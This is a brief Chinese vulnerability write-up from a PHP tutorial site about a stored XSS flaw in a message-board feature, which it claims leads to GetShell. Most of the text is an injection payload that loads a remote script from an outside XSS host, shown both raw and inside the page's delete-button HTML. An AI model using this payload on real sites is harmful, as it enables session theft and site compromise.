来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] 数据库对存入进行过滤,但是取出来的时候,仍然可利用XSS完成GetShell 在线留言功能里面留言主题在存入数据的时候都进行了过滤数据库内容数据库的字段长度为255,可以写任何的数据...
');var s=document.createElement('script');s.src='http://xssi.pw/fPJgOU';document.body.appendChild(s);('
<a class="icon delete end" onclick="content_del('1283','');var s=document.createElement('script');s.src='http://xssi.pw/fPJgOU';document.body.appendChild(s);('')" title="删除"></a>